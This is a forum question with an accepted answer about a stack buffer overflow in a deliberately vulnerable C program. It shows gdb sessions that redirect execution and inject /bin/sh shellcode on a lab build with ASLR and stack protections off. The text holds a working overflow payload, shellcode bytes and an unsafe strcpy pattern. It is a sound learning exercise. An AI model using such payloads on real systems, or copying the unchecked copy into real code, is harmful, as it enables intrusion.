# Can change flow of the program yet can't execute shellcode

Tags: linux, buffer-overflow, shellcode

I've created a small vulnerable C program, which normally won't call function overflowed.

```
void overflowed(){
        printf("%s\n","Hijacked");
}

void normally(char * st){
        char buffer[80];
        strcpy(buffer,st);
}

int main(int argc, char * argv[]){
        normally(argv[1]);
        printf("%s\n","Regulary executed");
        return 0;
}
```

Opened it up in gdb and managed to call function overflowed

```
(gdb) disass overflowed
Dump of assembler code for function overflowed:
   0x08048436 : push   %ebp
   0x08048437 : mov    %esp,%ebp
   0x08048439 : push   %ebx
   0x0804843a : call   0x80484bc 
   0x0804843f : add    $0x1bc1,%eax
   0x08048444 :    lea    -0x1ac0(%eax),%edx
   0x0804844a :    push   %edx
   0x0804844b :    mov    %eax,%ebx
   0x0804844d :    call   0x8048310 
   0x08048452 :    add    $0x4,%esp
   0x08048455 :    nop
   0x08048456 :    mov    -0x4(%ebp),%ebx
   0x08048459 :    leave  
   0x0804845a :    ret    
End of assembler dump.
(gdb) run $(python -c "print 'A'*88+'\x36\x84\x04\x08'")
Starting program: /root/vuln $(python -c "print 'A'*88+'\x36\x84\x04\x08'")
Hijacked

Program received signal SIGSEGV, Segmentation fault.
0xbffff500 in ?? ()
(gdb)
```

I've set a breakpoint on exit of function normally to check stack so i can see which return address to put. I've made it and the here is the output. I just can figure out why the shellcode won't get execute. Btw shellcode works, tested it already in C program to invoke this shellcode.

```
(gdb) run $(python -c "print '\x90'*62+'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80'+'\xf4\xf2\xff\xbf'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/vuln $(python -c "print '\x90'*62+'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80'+'\xf4\xf2\xff\xbf'")

Breakpoint 2, normally (st=0xbffff500 "") at vulnerable.c:11
11  }
(gdb) x/25xw $esp
0xbffff2f4: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff304: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff314: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff324: 0x90909090  0x90909090  0x90909090  0xc0319090
0xbffff334: 0x2f685099  0x6868732f  0x6e69622f  0x5350e389
0xbffff344: 0xc031e189  0x80cd0bb0  0xbffff2f4  0xbffff500
0xbffff354: 0x00000000
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff345 in ?? ()
(gdb)
```

ASLR is turned off, compiled with -fno-stack-protector, -z execstack and -no-pie.

Answer (score 1, accepted):

The reason why it failed is because of bad shellcode, i took the one from The Shellcoders Handbook and it worked like charm.